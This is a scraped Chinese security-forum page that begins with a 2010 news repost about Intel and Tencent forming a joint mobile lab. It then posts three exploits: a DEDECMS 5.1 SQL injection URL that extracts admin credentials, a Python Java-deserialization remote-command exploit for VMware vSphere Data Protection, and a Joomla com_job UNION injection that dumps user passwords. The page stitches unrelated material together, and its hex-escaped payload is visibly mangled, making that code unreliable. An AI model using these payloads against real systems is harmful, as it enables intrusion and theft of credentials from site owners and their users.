返回列表 发帖

英特尔与腾讯建立联合创新实验室

腾讯科技讯 北京时间11月3日,英特尔与腾讯公司签署了一项战略合作备忘录,旨在整合双方优势资源共同组建联合创新实验室,面向英特尔互联计算愿景和腾讯一站式在线生活服务目标,共推移动计算技术、产品与应用创新,为中国用户打造高品质移动生活体验。这是半年前两家公司宣布携手创新之后,双方合作内容的细化和深化。
    “计算已经成为我们日常生活不可或缺的一部分,英特尔正在改变开发和提供解决方案的方式,以实现互联计算愿景,” 英特尔公司高级副总裁兼软件与服务事业部总经理詹睿妮女士表示:“中国是世界上最大且最具增长潜力的移动通信市场,英特尔很高兴能够与中国互联网行业的领先厂商腾讯深化合作,共同把创新的高品质移动互联体验带给企业和个人用户。”
    当前,中国移动互联网用户数量迅速增长——随着3G网络覆盖全国,截止2010年6月底中国手机网民已达2.77亿人(数据来源:CNNIC报告)。而根据英特尔互联计算愿景,未来还将有数以亿计的移动终端如智能手机、平板电脑、车载信息设备等连接到互联网上,设备之间可实现互通一致切换,创造个性化的互联计算体验。英特尔架构正在为互联计算提供基础平台和核心技术驱动,帮助在诸多设备上实现高能效表现、安全性和互联网连接性。此次英特尔与腾讯深化双方战略合作,旨在将英特尔架构和软件技术的领先性和开放性,与腾讯的庞大用户基础和丰富应用服务相结合,有助于为国内用户创造集通信、互动及娱乐为一体、前所未有的高品质移动互联体验。
    根据签署的战略合作备忘录,双方希望立足于共同组建的联合创新实验室,计划基于英特尔?凌动?处理器和MeeGo*操作系统,打造一个更完备、更具市场竞争力的腾讯移动服务平台,除了开发更加友好的用户界面外,还将移动互联服务与终端设备软件完美结合,为终端用户提供无所不在的、全面整合的移动生活体验;未来,双方还将根据三网融合、云计算等发展趋势不断扩展技术和业务合作领域,包括面向不同屏幕规格和外形尺寸的便携设备,共推移动计算产品与应用创新,从而更好地支持腾讯为用户提供一站式在线生活服务的战略目标。
    “腾讯公司在中国拥有超过6亿注1的活跃帐户数,同时腾讯认同英特尔提出的互联计算愿景,也非常看重英特尔架构和软件技术所提供的广阔创新机遇,”腾讯公司联席首席技术官熊明华表示:“腾讯公司响应国家关于加快战略性新兴产业,尤其是新一代信息技术产业发展的要求,希望和英特尔强强携手、合作创新,面向新一代移动通信,打造全面整合的腾讯移动服务平台,并将一站式在线生活服务推送到下一代移动互联网智能终端和广大用户手中。”
    通过支持产业合作伙伴的创新助力中国战略性新兴产业发展和创新型经济,是英特尔一贯承诺的体现。2010年4月在北京举行的英特尔信息技术峰会(IDF2010)期间,英特尔和腾讯达成合作意向,宣布基于英特尔下一代移动计算平台和MeeGo*操作系统携手创新。根据英特尔和腾讯最新签订的战略合作备忘录,双方将实现优势互补,英特尔除计划为腾讯提供硬件、软件技术和创新资金支持,还可以通过英特尔软件服务全球生态链,支持腾讯QQ扩展海外服务网络。英特尔将通过深化本地合作延续其承诺,与中国IT产业共同迎接互联计算和“智能化”革命所带来的全新机遇。

 

您可能还想看的主题:

马化腾首次表态:手机安全不能交给一家公司

研究人员发现新型“无文件”恶意软件

谁知道 下面是如何计算出来的? 有报酬 高手来

腾讯、百度、金山共建最大反欺诈网址库

人民搜索推新版新闻搜索 联合中科院建实验室

英特尔收购McAfee交易恐因欧盟审查而推迟

腾讯发布盲人专用手机QQ

大学生QQ相约自杀 腾讯被判承担10%责任并赔偿

360与腾讯响应工信部要求 分别公开道歉

腾讯360掐架惹怒网民 有网络公司发布QQ劝架补丁

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:小一发表,本帖发表者小一符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者小一和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

DEDECMS5.1 feedback_js.php注入漏洞
<TABLE class="tab-content table-break" cellSpacing=0 cellPadding=0>



织梦(DEDECMS) 5.1 plus/feedback_js.php存在注入漏洞


影响版本: dedecms GBK 5.1漏洞描述: 在magic_quotes_gpc=off的情况下可用 此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl ...... $urlindex = 0; if(empty($arcID)) {         $row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");        //此处$arcurl没有过滤         if(is_array($row)) $urlindex = $row['id'];       //存在结果则把$urlindex赋值为查询到的$row['id'],我们可以构造SQL语句带入下面的操作中了 } if(empty($arcID) &amp;&amp; empty($urlindex)) exit(); //如果$arcID为空或$urlindex为空则退出 ...... if(empty($arcID)) $wq = " urlindex = '$urlindex' "; //我们让$arcID为空,刚才上面执行的结果就会被赋值给$wq带入下面的操作中执行了. else $wq = " aid='$arcID' "; $querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc"; $dlist->Init(); $dlist->SetSource($querystring); 为了闭合我用了两次union http://www.sitedir.com.cn/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='</TABLE>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

VMware 5.x /6.x vSphere数据保护Java序列化远程执行漏洞
#!/usr/bin/env python


import socket
import sys
import ssl


def getHeader():
    return 'x4ax52x4dx49x00x02x4b'

def payload():
    cmd = sys.argv[4]
    cmdlen = len(cmd)
    data2 = 'x00x09x31x32x37x2ex30x2ex31x2ex31x00x00x00x00x50xacxedx00x05x77x22x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x44x15x4dxc9xd4xe6x3bxdfx74x00x05x70x77x6ex65x64x73x7dx00x00x00x01x00x0fx6ax61x76x61x2ex72x6dx69x2ex52x65x6dx6fx74x65x70x78x72x00x17x6ax61x76x61x2ex6cx61x6ex67x2ex72x65x66x6cx65x63x74x2ex50x72x6fx78x79xe1x27xdax20xccx10x43xcbx02x00x01x4cx00x01x68x74x00x25x4cx6ax61x76x61x2fx6cx61x6ex67x2fx72x65x66x6cx65x63x74x2fx49x6ex76x6fx63x61x74x69x6fx6ex48x61x6ex64x6cx65x72x3bx70x78x70x73x72x00x32x73x75x6ex2ex72x65x66x6cx65x63x74x2ex61x6ex6ex6fx74x61x74x69x6fx6ex2ex41x6ex6ex6fx74x61x74x69x6fx6ex49x6ex76x6fx63x61x74x69x6fx6ex48x61x6ex64x6cx65x72x55xcaxf5x0fx15xcbx7exa5x02x00x02x4cx00x0cx6dx65x6dx62x65x72x56x61x6cx75x65x73x74x00x0fx4cx6ax61x76x61x2fx75x74x69x6cx2fx4dx61x70x3bx4cx00x04x74x79x70x65x74x00x11x4cx6ax61x76x61x2fx6cx61x6ex67x2fx43x6cx61x73x73x3bx70x78x70x73x72x00x11x6ax61x76x61x2ex75x74x69x6cx2ex48x61x73x68x4dx61x70x05x07xdaxc1xc3x16x60xd1x03x00x02x46x00x0ax6cx6fx61x64x46x61x63x74x6fx72x49x00x09x74x68x72x65x73x68x6fx6cx64x70x78x70x3fx40x00x00x00x00x00x0cx77x08x00x00x00x10x00x00x00x01x71x00x7ex00x00x73x71x00x7ex00x05x73x7dx00x00x00x01x00x0dx6ax61x76x61x2ex75x74x69x6cx2ex4dx61x70x70x78x71x00x7ex00x02x73x71x00x7ex00x05x73x72x00x2ax6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex6dx61x70x2ex4cx61x7ax79x4dx61x70x6exe5x94x82x9ex79x10x94x03x00x01x4cx00x07x66x61x63x74x6fx72x79x74x00x2cx4cx6fx72x67x2fx61x70x61x63x68x65x2fx63x6fx6dx6dx6fx6ex73x2fx63x6fx6cx6cx65x63x74x69x6fx6ex73x2fx54x72x61x6ex73x66x6fx72x6dx65x72x3bx70x78x70x73x72x00x3ax6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex66x75x6ex63x74x6fx72x73x2ex43x68x61x69x6ex65x64x54x72x61x6ex73x66x6fx72x6dx65x72x30xc7x97xecx28x7ax97x04x02x00x01x5bx00x0dx69x54x72x61x6ex73x66x6fx72x6dx65x72x73x74x00x2dx5bx4cx6fx72x67x2fx61x70x61x63x68x65x2fx63x6fx6dx6dx6fx6ex73x2fx63x6fx6cx6cx65x63x74x69x6fx6ex73x2fx54x72x61x6ex73x66x6fx72x6dx65x72x3bx70x78x70x75x72x00x2dx5bx4cx6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex54x72x61x6ex73x66x6fx72x6dx65x72x3bxbdx56x2axf1xd8x34x18x99x02x00x00x70x78x70x00x00x00x05x73x72x00x3bx6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex66x75x6ex63x74x6fx72x73x2ex43x6fx6ex73x74x61x6ex74x54x72x61x6ex73x66x6fx72x6dx65x72x58x76x90x11x41x02xb1x94x02x00x01x4cx00x09x69x43x6fx6ex73x74x61x6ex74x74x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx4fx62x6ax65x63x74x3bx70x78x70x76x72x00x11x6ax61x76x61x2ex6cx61x6ex67x2ex52x75x6ex74x69x6dx65x00x00x00x00x00x00x00x00x00x00x00x70x78x70x73x72x00x3ax6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex66x75x6ex63x74x6fx72x73x2ex49x6ex76x6fx6bx65x72x54x72x61x6ex73x66x6fx72x6dx65x72x87xe8xffx6bx7bx7cxcex38x02x00x03x5bx00x05x69x41x72x67x73x74x00x13x5bx4cx6ax61x76x61x2fx6cx61x6ex67x2fx4fx62x6ax65x63x74x3bx4cx00x0bx69x4dx65x74x68x6fx64x4ex61x6dx65x74x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx53x74x72x69x6ex67x3bx5bx00x0bx69x50x61x72x61x6dx54x79x70x65x73x74x00x12x5bx4cx6ax61x76x61x2fx6cx61x6ex67x2fx43x6cx61x73x73x3bx70x78x70x75x72x00x13x5bx4cx6ax61x76x61x2ex6cx61x6ex67x2ex4fx62x6ax65x63x74x3bx90xcex58x9fx10x73x29x6cx02x00x00x70x78x70x00x00x00x02x74x00x0ax67x65x74x52x75x6ex74x69x6dx65x75x72x00x12x5bx4cx6ax61x76x61x2ex6cx61x6ex67x2ex43x6cx61x73x73x3bxabx16xd7xaexcbxcdx5ax99x02x00x00x70x78x70x00x00x00x00x74x00x09x67x65x74x4dx65x74x68x6fx64x75x71x00x7ex00x24x00x00x00x02x76x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex53x74x72x69x6ex67xa0xf0xa4x38x7ax3bxb3x42x02x00x00x70x78x70x76x71x00x7ex00x24x73x71x00x7ex00x1cx75x71x00x7ex00x21x00x00x00x02x70x75x71x00x7ex00x21x00x00x00x00x74x00x06x69x6ex76x6fx6bx65x75x71x00x7ex00x24x00x00x00x02x76x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4fx62x6ax65x63x74x00x00x00x00x00x00x00x00x00x00x00x70x78x70x76x71x00x7ex00x21x73x71x00x7ex00x1cx75x72x00x13x5bx4cx6ax61x76x61x2ex6cx61x6ex67x2ex53x74x72x69x6ex67x3bxadxd2x56xe7xe9x1dx7bx47x02x00x00x70x78x70x00x00x00x01x74'
    data2 += 'x00' + chr(cmdlen)
    data2 += cmd
    data2 += 'x74x00x04x65x78x65x63x75x71x00x7ex00x24x00x00x00x01x71x00x7ex00x29x73x71x00x7ex00x17x73x72x00x11x6ax61x76x61x2ex6cx61x6ex67x2ex49x6ex74x65x67x65x72x12xe2xa0xa4xf7x81x87x38x02x00x01x49x00x05x76x61x6cx75x65x70x78x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4ex75x6dx62x65x72x86xacx95x1dx0bx94xe0x8bx02x00x00x70x78x70x00x00x00x01x73x71x00x7ex00x09x3fx40x00x00x00x00x00x10x77x08x00x00x00x10x00x00x00x00x78x78x76x72x00x12x6ax61x76x61x2ex6cx61x6ex67x2ex4fx76x65x72x72x69x64x65x00x00x00x00x00x00x00x00x00x00x00x70x78x70x71x00x7ex00x3fx78x71x00x7ex00x3f'
    return data2

def sslMode():
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
    return ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLSv1, ciphers="ALL")

def exploitTarget(sock):
    server_address = (sys.argv[1], int(sys.argv[2]))
    print 'connecting to %s port %s' % server_address
    sock.connect(server_address)
    print 'sending exploit headers
'
    sock.send(getHeader())
    sock.recv(8192)
    print 'sending exploit
'
    sock.send(payload())
    sock.close()
    print 'exploit completed.'

if __name__ == "__main__":
    if len(sys.argv) != 5:
        print 'Usage: python ' + sys.argv[0] + ' host port ssl cmd'
        print 'ie: python ' + sys.argv[0] + ' 192.168.1.100 1099 false "ping -c 4 yahoo.com"'
        sys.exit(0)
    else:
        sock = None
        if sys.argv[3] == "true" or sys.argv[3] == "TRUE" or sys.argv[3] == True:
            sock = sslMode()
        if sys.argv[3] == "false" or sys.argv[3] == "FALSE" or sys.argv[3] == False:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
        exploitTarget(sock)


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Joomla最新SQL注射漏洞
# Title: Joomla (Job Component) SQL Injection Vulnerability
# EDB-ID: 11307
# CVE-ID: ()
# OSVDB-ID: ()
# Author: B-HUNT3|2
# Published: 2010-02-01


<table>[~]>> ...[BEGIN ADVISORY]...


</table>

<table>  


</table>

<table>!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!


</table>

<table>  


</table>

<table>[~]>> TITLE: Joomla (Job Component) SQL Injection Vulnerability


</table>

<table>[~]>> LANGUAGE: PHP


</table>

<table>[~]>> RESEARCHER: B-HUNT3|2


</table>

<table>[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com


</table>

<table>  


</table>

<table>  


</table>

<table>!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!


</table>

<table>  


</table>

<table>[~]>> DESCRIPTION: Input var id_job is vulnerable to SQL Code Injection


</table>

<table>[~]>> AFFECTED VERSIONS: N/A


</table>

<table>[~]>> RISK: Medium/High


</table>

<table>[~]>> IMPACT: Execute Arbitrary SQL queries


</table>

<table>  


</table>

<table>!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!


</table>

<table>  


</table>

<table>[~]>> PROOF OF CONCEPT:


</table>

<table>  


</table>

<table>[~]>> http://server/index.php?option=com_job&amp;controller=listcategory&amp;task=viewJob&amp;id_job=[SQL]


</table>

<table>  


</table>

<table>[~]>> http://server/index.php?option=com_job&amp;controller=listcategory&amp;task=viewJob&amp;id_job=-1+UNION+ALL+SELECT+1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+FROM+jos_users--


</table>

<table>  


</table>

<table>!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!


</table>

<table>  


</table>

<table>[~]>> ...[END ADVISORY]...


</table>






















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表